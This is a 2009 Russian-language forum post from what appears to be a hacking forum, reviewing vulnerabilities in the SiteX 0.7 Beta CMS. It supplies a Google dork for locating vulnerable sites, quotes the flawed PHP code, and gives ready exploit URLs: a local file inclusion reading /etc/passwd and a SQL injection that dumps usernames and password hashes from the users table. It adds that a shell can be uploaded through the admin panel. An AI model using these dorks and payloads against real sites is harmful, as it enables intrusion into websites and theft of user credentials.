Обзор Уязвимостей SiteX

Обзор Уязвимостей SiteX

15.04.2009, 12:56

Iceangel_

Постоянный

Регистрация: 09.07.2006

Сообщений: 553

С нами: 10441826

Репутация: 1861

Обзор Уязвимостей SiteX

Уязвимости SiteX 0.7 Beta

download: http://jaist.dl.sourceforge.net/sourceforge/sitex/SiteX_074_build_418.zip

dork: "Powered by SiteX 0.7 Beta"
(выдачу гугла больше 10 линков не ставьте

)

1) [LFI] (требования: magic_quotes=off, register_globals=on)

/themes/Corporate/homepage.php
уязвимый код:

PHP код:


		
			
include("themes/$THEME_FOLDER/header.php");

эксплуатирование:

Код:

/themes/Corporate/homepage.php?THEME_FOLDER=../../../../../../../../etc/passwd%00

2) [SQL-injection] (требования: magic_quotes=off, register_globals=on)

links.php
уязвимый код:

PHP код:


		
			
if($category)

    {

        $query = "SELECT * FROM $DB_Links_Groups WHERE id='$category'";

        $result = mysql_query($query, $Link) or queryError("8", mysql_error());

эксплуатирование:

Код:

/links.php?category=-1'+union+select+1,concat_ws(0x3a,username,password),3+from+sitex_users--+

P.S:
шелл в админке аплоадится без проблем

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось Iceangel_; 15.04.2009 в 13:23..

Похожие темы

Тема

Автор

Раздел

Ответов

Последнее сообщение

Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

it's my

Веб-уязвимости

361

24.10.2019 10:25

[ Обзор уязвимостей RunCMS ]

Solide Snake

Веб-уязвимости

07.07.2012 02:09

[ Обзор уязвимостей PHP-Nuke ]

[53x]Shadow

Веб-уязвимости

04.02.2012 20:33

[ Обзор уязвимостей #osCommerce# ]

life_is_shit

Веб-уязвимости

10.11.2009 17:43